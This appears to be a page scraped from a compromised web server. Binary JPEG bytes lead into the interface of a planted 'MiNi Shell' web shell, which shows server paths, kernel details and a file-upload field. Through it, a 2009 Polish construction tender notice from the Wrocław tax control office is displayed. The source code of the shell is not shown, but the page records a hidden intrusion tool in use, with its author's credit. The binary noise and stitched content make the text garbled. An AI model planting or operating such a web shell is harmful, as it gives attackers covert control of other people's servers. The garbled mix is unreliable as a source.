JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20090106/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20090106/4535-N-2009.html

<p class="kh_header"><b>Wrocław: UKS 0291/DO/2411/163/08/5/999</b><br>
<b>Numer ogłoszenia: 4535 - 2009; data zamieszczenia: 06.01.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Kontroli Skarbowej we Wrocławiu , ul. Stacyjna 10, 53-613 Wrocław, woj. dolnośląskie, tel. 071 3583943, faks 071 3583943.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.uks.wroclaw.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja rządowa terenowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> UKS 0291/DO/2411/163/08/5/999.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest rozbudowa i adaptacja budynku Urzędu Kontroli Skarbowej we Wrocławiu przy ul. Stacyjnej 10A,53-613 Wrocław. Szczegółowy opis przedmiotu zamówienia znajduje się w Załącznikach do SIWZ , w projekcie umowy - Załącznik nr 6 do SIWZ oraz dokumentacji technicznej opracowany przez: Pracownię Architektoniczną ARCHIKON Anna Kościuk 51-690 WROCŁAW ul. Walerego Sławka 11
Zakres prac obejmuje między innymi :
- Roboty rozbiórkowe i ziemne,
- Roboty betonowe i żelbetowe,
- Roboty murarskie, 
- Montaż konstrukcji stalowych;
- Roboty wykończeniowe 
- Kładzenie i pokrywanie podłóg,
- Tynki,
- Okładziny ścienne, 
- Roboty malarskie,
- Montaż stolarki budowlanej,
- Montaż sufitów podwieszanych,
- Montaż ślusarki,
- Montaż ścianek działowych;
- Roboty instalacyjne obejmujące wykonanie wewnętrznych instalacji:
- wody zimnej i ciepłej,
- kanalizacji sanitarnej,
- przeciwpożarowej,
- centralnego ogrzewania,
- wentylacji mechanicznej i klimatyzacji,
- elektrycznej,
- teletechnicznej i okablowanie strukturalnego.

Wymogiem Zamawiającego jest położenie nowej nawierzchni na dziedzińcu. Teren dziedzińca spełniać będzie funkcje parkingowe, manewrowe oraz dojazdowe do pomieszczeń technicznych i  garaży.
Oprócz prac objętych projektem Zamawiający wymaga wykonania instalacji sygnalizacji włamania i napadu połączonej funkcjonalnie z istniejącym budynkiem Urzędu przy ul. Stacyjnej 10.
Uwaga- w odniesieniu do instalacji alarmowej SSWiN należy wykonać projekt, który na etapie wykonawstwa należy uzgodnić z Zamawiającym. Według projektu należy sporządzić wycenę uwzględniając zapisy jak wyżej tzn. połączenie funkcjonalne z istniejącym w budynku przy ul. Stacyjnej 10 systemem.
W odniesieniu do zagospodarowania terenu (dziedziniec) należy wycenić nawierzchnię z mieszanki asfaltu lanego grysowo- żwirowego- warstwa ścieralna- 5 cm o powierzchni ok. 774 m2 oraz 80.80 m2 z kostki betonowej (będącej w posiadaniu Zamawiającego) układanej na podbudowie z klińca. 
Ponadto regulacja 4 studni o grubości 20 cm, rozbiórka płytek chodnikowych ok. 50,80 m2 oraz korytowanie na głębokość 20 cm. Natomiast oświetlenie dziedzińca przy użyciu lamp halogenowych wraz z czujnikami ruchu winno być zamontowane na elewacji budynku w 5 punktach..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.10.00.00-8, 45.11.10.00-9, 45.26.23.11-4, 45.26.25.20-2, 45.30.00.00-0, 45.33.22.00-5, 45.33.11.00-7, 45.33.12.00-8, 45.31.51.00-9, 45.31.43.00-4, 45.32.00.00-6, 43.40.00.00-1, 45.41.00.00-4, 45.43.22.00-6, 45.43.21.00-5, 45.44.21.00-8, 45.42.10.00-4, 45.42.11.46-9, 45.42.11.41-4.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 7.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Wykonawca przystępujący do postępowania jest zobowiązany wnieść wadium w wysokości 52.000,00 zł (słownie złotych: pięćdziesiąt dwa 00/100).
1.1.	Forma wadium
Wadium może być wniesione w jednej lub kilku następujących formach:
1.	pieniądzu,
2.	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo- kredytowej z tym, że poręczenie kasy jest zawsze poręczeniem pieniężnym,
3.	gwarancjach bankowych,
4.	gwarancjach ubezpieczeniowych,
5.	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (tj. Dz. U. z 2007 r. Nr 42, poz. 275).
6.	  Z treści dokumentów wymienionych od ppkt 2 do 5 winno wynikać bezwarunkowe, na każde pisemne żądanie zgłoszone przez Zamawiającego, zobowiązanie gwaranta, poręczyciela do wypłaty Zamawiającemu pełnej kwoty wadium w okolicznościach określonych w przepisie art. 46 ust. 5 ustawy Pzp. 
1.2.	Termin i miejsce wniesienia wadium
Wadium należy wnieść przed upływem terminu składania ofert.
W przypadku wnoszenia wadium w pieniądzu ustaloną kwotę należy wpłacić przelewem na konto Zamawiającego w Narodowym Banku Polskim Oddział Okręgowy Wrocław 20101016740061901391200000 z dopiskiem WADIUM (decyduje data wpływu pieniędzy na rachunek Zamawiającego). Kserokopię dowodu wpłaty należy złożyć w siedzibie Zamawiającego w odrębnej kopercie oznaczonej: WADIUM- rozbudowa i adaptacja budynku  Urzędu Kontroli Skarbowej we Wrocławiu przy ul. Stacyjnej 10A, 53-613 Wrocław - przetarg.
W przypadku wnoszenia wadium w pozostałych dopuszczalnych formach określonych w pkt 7.1 od ppkt 2 do 5 SIWZ, dokument potwierdzający wniesienie wadium należy złożyć w siedzibie Zamawiającego w odrębnej kopercie oznaczonej: WADIUM- rozbudowa i adaptacja budynku do pełnienia funkcji biurowej  Urzędu Kontroli Skarbowej we Wrocławiu przy ul. Stacyjnej 10A, 53-613 Wrocław - przetarg.
Nie wniesienie wadium w wymaganym terminie oraz wymaganej wysokości i formie skutkuje wykluczeniem Wykonawcy z postępowania, a jego ofertę uznaje się za odrzuconą.
1.3.	Zwrot wadium
1.	Zamawiający niezwłocznie zwróci wadium, jeżeli:
1)	upłynął termin związania ofertą;
2)	zawarto umowę w sprawie zamówienia publicznego i wniesiono zabezpieczenie należytego wykonania tej umowy;
3)	Zamawiający unieważnił postępowanie o udzielenie zamówienia, a protesty zostały ostatecznie rozstrzygnięte lub upłynął termin do ich wnoszenia.
2.	Zamawiający (z zastrzeżeniem art. 46 ust. 4a ustawy Pzp) zwraca niezwłocznie wadium na wniosek Wykonawcy: 
1)	który wycofał ofertę przed upływem terminu składania ofert;
2)	który został wykluczony z postępowania;
3)	którego oferta została odrzucona.
3.	Jeżeli wadium wniesiono w pieniądzu, Zamawiający zwraca je wraz z odsetkami wynikającymi z umowy rachunku bankowego, na którym było ono przechowywane, pomniejszone o koszty prowadzenia rachunku bankowego oraz prowizji bankowej za przelew pieniędzy na rachunek bankowy wskazany przez Wykonawcę.
4.	Zamawiający zażąda ponownego wniesienia wadium przez Wykonawców, którym zwrócono wadium na podstawie pkt 2 ppkt 2 i 3, jeżeli w wyniku ostatecznego rozstrzygnięcia protestu unieważniono czynność wykluczenia Wykonawcy lub odrzucenia oferty. Wykonawcy wnoszą wadium w terminie określonym przez Zamawiającego.
1.4.	Utrata wadium
1.	Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca, którego oferta została wybrana:
-odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie;
- nie wniósł wymaganego zabezpieczenia należytego wykonania umowy;
- zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie Wykonawcy.
2.	Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca w odpowiedzi na wezwanie, o  którym mowa w art. 26 ust. 3 PZP, nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1 PZP, lub pełnomocnictw, chyba że udowodni, że wynika to z przyczyn nieleżących po jego stronie.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O zamówienie mogą ubiegać się Wykonawcy, którzy spełniają następujące warunki: 
1.	Nie podlegają wykluczeniu z postępowania na podstawie art. 24 ust. 1 i ust. 2 P.z.p. Spełnienie ww. warunku oceniane będzie na podstawie dokumentów wchodzących w skład oferty.
2.	 Spełniają i przyjmują warunki określone w niniejszej SIWZ oraz w załącznikach do niej, które stanowią integralną część specyfikacji.
3.	Posiadają ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej na kwotę odpowiadającą co najmniej 3.000000,00zł oraz przedłożą polisę lub inny dokument potwierdzający fakt ubezpieczenia na dzień złożenia oferty. W przypadku gdy suma ubezpieczenia będzie niższa niż cena ofertowa Wykonawca zobowiązany jest przed podpisaniem umowy przedłożyć Zamawiającemu kopię polisy ubezpieczenia na różnicę wynikającą z kwoty ofertowej pomniejszonej o sumę ubezpieczenia
4.	Ocena spełnienia warunków udziału w postępowaniu wymaganych od Wykonawcy zostanie dokonana wg formuły: spełnia - nie spełnia
5.	W toku oceny spełniania warunków udziału w postępowaniu, Zamawiający, o ile zajdzie taka potrzeba:
1.  wezwie Wykonawców, którzy w określonym terminie nie złożyli wymaganych przez zamawiającego oświadczeń lub dokumentów, o których mowa w art. 25 ust. 1, lub którzy nie złożyli pełnomocnictw, albo którzy złożyli wymagane przez zamawiającego oświadczenia i dokumenty, o których mowa w art. 25 ust. 1, zawierające błędy lub którzy złożyli wadliwe pełnomocnictwa, do ich złożenia w wyznaczonym terminie, chyba że mimo ich złożenia oferta wykonawcy podlega odrzuceniu albo konieczne byłoby unieważnienie postępowania. Złożone na wezwanie zamawiającego oświadczenia i dokumenty powinny potwierdzać spełnianie przez wykonawcę warunków udziału w postępowaniu oraz spełnianie przez oferowane dostawy, usługi lub roboty budowlane wymagań określonych przez zamawiającego, nie później niż w dniu, w którym upłynął termin składania wniosków o dopuszczenie do udziału w postępowaniu albo termin składania ofert;
2.	wezwie Wykonawców, w wyznaczonym przez siebie terminie, do złożenia wyjaśnień dotyczących oświadczeń lub dokumentów, o których mowa w art. 25 ust 1 Pzp..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Dla udokumentowania spełnienia wymaganych warunków oferta musi zawierać następujące dokumenty: 
1.	Wypełniony i podpisany formularz ofertowy - załącznik nr 2 do SIWZ.
2.	Wypełnione i podpisane oświadczenie o spełnianiu przez Wykonawcę warunków udziału w postępowaniu - załącznik nr 1 do SIWZ. 
3.	Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawiony nie wcześniej niż sześć miesięcy przed upływem terminu składania ofert. 
4.	Wskazanie pełnomocnika podmiotów występujących wspólnie.
5.	Wykaz wykonanych robót budowlanych w okresie ostatnich pięciu lat przed dniem
		wszczęcia postępowania o udzielenie zamówienia publicznego, a jeżeli okres
		prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem
		i wartością robotom budowlanym stanowiącym przedmiot zamówienia nie mniejszy
		niż cena wskazana w ofercie, z podaniem ich wartości oraz daty i miejsca wykonania według
		wzoru, stanowiącego załącznik nr 3 do niniejszej SIWZ oraz dokumenty potwierdzające,
		że roboty te zostały wykonane należycie (referencje).
		Zamawiający uzna, że wykonawca posiada niezbędne doświadczenie, jeżeli wykaże, iż w
	ciągu ostatnich 5 lat wykonał minimum 2 realizacje budynku użyteczności publicznej* o zbliżonym do niniejszego przedmiotu zamówienia zakresie.
	* budynek użyteczności publicznej należy przez to rozumieć budynek przeznaczony na potrzeby administracji publicznej, wymiaru sprawiedliwości, kultury, kultu religijnego, oświaty, szkolnictwa wyższego, nauki, opieki zdrowotnej, opieki społecznej i socjalnej, obsługi bankowej, handlu, gastronomii, usług, turystyki, sportu, obsługi pasażerów w transporcie kolejowym, drogowym, lotniczym, morskim lub wodnym śródlądowym, świadczenia usług pocztowych lub telekomunikacyjnych oraz inny ogólnodostępny budynek przeznaczony do wykonywania podobnych funkcji, w tym także budynek biurowy i socjalny (§ 3 pkt 6 rozporządzenia Ministra Infrastruktury z dnia 12 kwietnia 2002 r. w sprawie warunków technicznych, jakim powinny odpowiadać budynki i ich usytuowanie - Dz. U. z 2002 r. Nr 75, poz. 690 z późn. zm.)
		W przypadku składania oferty wspólnej wykonawcy składający ofertę wspólną składają
		jeden wspólny ww. wykaz. Warunek zostanie uznany przez zamawiającego za spełniony,
jeżeli co najmniej jeden z wykonawców składających ofertę wspólną będzie
spełniać ww warunek.
6.	Wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, wraz
z danymi na temat ich kwalifikacji zawodowych ,doświadczenia i wykształcenia
niezbędnych do wykonania zamówienia a także zakresu wykonywanych przez nie
czynności stanowiący załącznik nr 4 do SIWZ .
Zamawiający uzna, że Wykonawca dysponuje osobami zdolnymi do wykonania zamówienia, jeżeli przedstawi w ofercie kandydata/kandydatów na każde n/w stanowisko:
1. Kierownika budowy - posiadającego uprawnienia do kierowania robotami budowlanymi 
W specjalności konstrukcyjno-budowlanej bez ograniczeń.
2. Kierownika robót elektrycznych - posiadającego uprawnienia do kierowania robotami
budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji i
urządzeń elektrycznych i elektroenergetycznych bez ograniczeń.
3. Kierownika robót sanitarnych - posiadającego uprawnienia do kierowania robotami
budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji i
urządzeń cieplnych, wentylacyjnych, gazowych wodociągowych i
kanalizacyjnych bez ograniczeń.
4. Wszystkie osoby wymienione w ofercie winny posiadać odpowiednie uprawnienia
budowlane do kierowania robotami budowlanymi, zgodnie z ustawą z dnia 7 lipca 1994 r.
Prawo budowlane (tekst jednolity Dz. U. z 2006 r., Nr 156, poz. 1118 ze zm)
 i z rozporządzeniem Ministra Transportu i Budownictwa z dnia 28 kwietnia 2006 r. w sprawie samodzielnych funkcji technicznych w budownictwie (Dz.U. z 2006 r., Nr 83, poz. 578) oraz aktualne zaświadczenia o wpisie na listę członków właściwej Izby Samorządu Zawodowego.
Kopie w/w dokumentów należy dołączyć do oferty.
5. Wykaz podmiotów, które będą uczestniczyć w wykonaniu zadania stanowiący załącznik nr 5 do SIWZ.
6. Dla realizacji zamówienia wymaga się żeby przynajmniej 1 osoba posiadała certyfikat producenta systemu okablowania strukturalnego do wykonania okablowania strukturalnego. (dotyczący posiadania kwalifikacji w zakresie: projektowania, nadzoru instalacji oraz kwalifikowania okablowania strukturalnego do 20 letniej gwarancji niezawodności).
7.	Aktualne zaświadczenie właściwego naczelnika urzędu skarbowego, że Wykonawca nie zalega z opłacaniem podatków lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności, lub wstrzymanie w całości wykonania decyzji organu podatkowego, wystawione nie wcześniej niż trzy miesiące przed upływem terminu składania ofert. 
8.	Aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające odpowiednio, że Wykonawca nie zalega z opłacaniem opłat oraz składek na ubezpieczenie zdrowotne i społeczne lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu wystawione nie wcześniej niż trzy miesiące przed upływem terminu składania ofert. 
9.	Aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt. 4, 5, 6, 7 i 8 P.z.p., wystawioną nie wcześniej niż sześć miesięcy przed upływem terminu składania ofert (dotyczącą wszystkich urzędujących członków władz Wykonawcy). 
10.	Aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt. 9 P.z.p., wystawioną nie wcześniej niż sześć miesięcy przed upływem terminu składania ofert. 
11.	Jeżeli w kraju pochodzenia osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania nie wydaje się dokumentów, o których mowa w punktach: 12.3,12.5,12.6,12.7,12.8,12.9, Wykonawca zastępuje je dokumentami zawierającymi oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania.
12.	Polisa lub inny dokument ubezpieczenia potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej. 
13.	Dowód wpłacenia wadium lub dokumenty potwierdzające jego wniesienie w innej formie..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.uks.wroclaw.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Specyfikację istotnych warunków zamówienia można uzyskać pod adresem: Urząd Kontroli Skarbowej ul. Stacyjna 10. 53-613 Wrocław pok nr 3..</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 04.02.2009 godzina 08:00, miejsce: Urząd Kontroli Skarbowej we Wrocławiu ul. Stacyjna 10 pok 10..</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com